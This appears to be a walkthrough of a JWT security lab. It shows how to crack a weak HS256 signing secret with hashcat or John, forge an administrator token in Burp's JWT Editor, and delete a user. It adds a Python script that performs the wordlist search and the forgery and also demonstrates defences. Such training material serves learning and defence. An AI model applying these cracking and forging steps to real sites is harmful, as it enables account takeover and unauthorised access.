Brute-forcing secret keys

Brute-forcing secret keys using hashcat

Hashcat

hashcat -a 0 -m 16500 <jwt> <wordlist>

Output format: <jwt>:<identified-secret>

If you run the command more than once, hashcat reports the hash as already cracked (the result is stored in its potfile); add the --show flag to print the recovered secret again.

Lab

This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets.

To solve the lab, first brute-force the website's secret key. Once you've obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Steps

Getting the JWT Token

  • Install the JWT Editor extension in Burp Suite

  • Visit the website and log in with the username wiener and the password peter

  • Capture the session request in Burp and copy the JWT from it

Brute-force the JWT secret using Hashcat or John

hashcat -a 0 -m 16500 <JWT Token> <Wordlist>
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

Creating and Signing tokens using the secret key

  • Go to the JWT Editor tab

  • Click New Symmetric Key

  • Select the Specify secret option and enter the recovered key, "secret1"

  • Click Generate, then OK

  • Now visit the /admin route and send the request to Burp Repeater

  • In the payload section, change the sub value to administrator

  • Click Sign, then OK, so the token is re-signed with the recovered key
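The two techniques above, the wordlist check that hashcat and John perform and the re-signing that JWT Editor performs, both come down to one HMAC-SHA256 over the base64url-encoded header and payload. The following is an added example (not part of the original writeup, and not code from PortSwigger or the JWT Editor project) that implements both in plain Python and also shows the defender's side: a verifier that recomputes the signature in constant time and rejects anything not signed with HS256, and a comparison showing that the same wordlist finds the weak key "secret1" but not a 32-byte random key. The token contents, the wordlist and the secrets are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Iterable, Optional


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWS (RFC 7515) requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(s: str) -> bytes:
    """Inverse of b64url: restore padding before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def hs256_sign(payload: dict, secret: bytes, header: Optional[dict] = None) -> str:
    """Build a JWT and sign header.payload with HMAC-SHA256 under `secret`."""
    header = header or {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def hs256_verify(token: str, secret: bytes) -> Optional[dict]:
    """Server-side check: recompute the MAC and compare in constant time.

    Returns the decoded payload on success, None on any failure. The header
    is parsed only to confirm alg is HS256; a token claiming another alg is
    rejected outright rather than trusted.
    """
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def find_weak_secret(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary check, the same work hashcat -m 16500 does: return the first
    candidate secret whose HMAC matches the token's signature, else None."""
    for candidate in wordlist:
        if hs256_verify(token, candidate.encode()) is not None:
            return candidate
    return None


# Constructed sample data for the example (not values captured from the lab).
WEAK_SECRET = b"secret1"
WORDLIST = ["password", "123456", "jwt", "secret", "secret1", "changeme"]
USER_CLAIMS = {"iss": "example", "sub": "wiener", "exp": 1700000000}


def demo() -> dict:
    """Walk through the lab's logic end to end and return the observations."""
    # 1. A token as the lab's server would issue it, signed with the weak key.
    issued = hs256_sign(USER_CLAIMS, WEAK_SECRET)
    recovered = find_weak_secret(issued, WORDLIST)

    # 2. With the key known, a modified payload can be re-signed (JWT Editor's
    #    "Sign" button) and the server's own verifier accepts it.
    forged = hs256_sign(dict(USER_CLAIMS, sub="administrator"), WEAK_SECRET)
    forged_accepted = hs256_verify(forged, WEAK_SECRET)

    # 3. Mitigation: a 256-bit random secret, which no wordlist will contain.
    strong_secret = secrets.token_bytes(32)
    strong_token = hs256_sign(USER_CLAIMS, strong_secret)
    strong_recovered = find_weak_secret(strong_token, WORDLIST)

    return {
        "recovered_secret": recovered,
        "forged_sub": forged_accepted["sub"] if forged_accepted else None,
        "forged_rejected_by_other_key": hs256_verify(forged, b"other") is None,
        "strong_secret_recovered": strong_recovered,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the script prints that "secret1" is recovered from the sample token, that the re-signed token with sub=administrator validates under that key, and that nothing is recovered from the token signed with the random key. The verifier's alg check and `hmac.compare_digest` are the two details worth copying into real code: the first stops a token from choosing its own algorithm, the second prevents a timing side channel on the signature comparison. Neither helps if the secret itself is guessable, which is the point of the lab.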

Delete the user carlos from the admin panel using the re-signed token